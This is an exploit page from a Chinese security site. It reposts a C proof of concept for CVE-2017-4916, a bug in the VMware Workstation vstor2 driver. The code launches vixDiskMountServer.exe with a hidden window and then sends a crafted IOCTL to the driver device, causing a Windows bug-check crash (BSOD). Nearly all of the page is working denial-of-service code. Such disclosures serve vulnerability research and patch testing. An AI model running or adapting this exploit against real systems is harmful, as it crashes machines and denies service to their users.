首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VMware Workstation 12 Pro - Denial of Service
来源:@BorjaMerino 作者:Merino 发布时间:2017-06-09  
/*
 * Title: NULL pointer dereference vulnerability in vstor2 driver (VMware Workstation Pro/Player)
 * CVE: 2017-4916 (VMSA-2017-0009)
 * Author: Borja Merino (@BorjaMerino)
 * Date: May 18, 2017
 * Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 12 Pro (12.5.5 build-5234757)
 * Affected: VMware Workstation Pro/Player 12.x
 * Description: This p0c produces a BSOD by sending a specific IOCTL code to the vstor2_mntapi20_shared device
 * driver due to a double call to IofCompleteRequest (generating a MULTIPLE_IRP_COMPLETE_REQUESTS bug check)
*/
 
#include "windows.h"
#include "stdio.h"
 
void ioctl_crash()
{
    HANDLE hfile;
    WCHAR *vstore = L"\\\\.\\vstor2-mntapi20-shared";
    DWORD dummy;
    char reply[0x3FDC];
    hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    char buf[384] = "\x80\x01\x00\x00\xc8\xdc\x00\x00\xba\xab";
    DeviceIoControl(hfile, 0x2a002c, buf, 382, reply, sizeof(reply), &dummy, NULL);
}
 
void run_vix()
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    RtlZeroMemory(&si, sizeof(si));
    RtlZeroMemory(&pi, sizeof(pi));
    si.dwFlags |= STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    DWORD createFlags = CREATE_SUSPENDED;
    CreateProcess(L"C:\\Program Files (x86)\\VMware\\VMware Workstation\\vixDiskMountServer.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
}
 
void main()
{
    run_vix(); //Comment this if vixDiskMountServer.exe is already running
    ioctl_crash();
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows UAC Protection Bypass
·Mapscrn 2.03 - Local Buffer Ov
·Mikrotik RouterOS 6.28 FTP Buf
·Apple macOS 10.12.3 / iOS < 10
·PuTTY < 0.68 - 'ssh_agent_chan
·Apple macOS - Disk Arbitration
·Linux Kernel < 4.10.13 - 'keyc
·IPFire 2.19 - Remote Code Exec
·Linux Kernel - 'ping' Local De
·VMware vSphere Data Protection
·DC/OS Marathon UI - Docker Exp
·EFS Easy Chat Server 3.1 - Pas
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved